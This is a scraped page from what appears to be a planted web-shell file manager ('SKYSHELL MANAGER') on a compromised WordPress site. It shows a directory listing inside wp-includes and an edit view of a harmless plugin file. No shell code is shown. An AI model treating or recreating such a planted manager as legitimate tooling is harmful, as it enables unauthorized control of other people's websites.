📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
modern
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
2692.92 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: class-wpvr-i18n.php
<?php /** * Define the internationalization functionality * * Loads and defines the internationalization files for this plugin * so that it is ready for translation. * * @link http://rextheme.com/ * @since 1.0.0 * * @package Wpvr * @subpackage Wpvr/includes */ /** * Define the internationalization functionality. * * Loads and defines the internationalization files for this plugin * so that it is ready for translation. * * @since 1.0.0 * @package Wpvr * @subpackage Wpvr/includes * @author Rextheme <support@rextheme.com> */ class Wpvr_i18n { //phpcs:ignore /** * Load the plugin text domain for translation. * * @since 1.0.0 */ public function load_plugin_textdomain() { load_plugin_textdomain( 'wpvr', false, dirname( dirname( plugin_basename( __FILE__ ) ) ) . '/languages/' ); } }
Save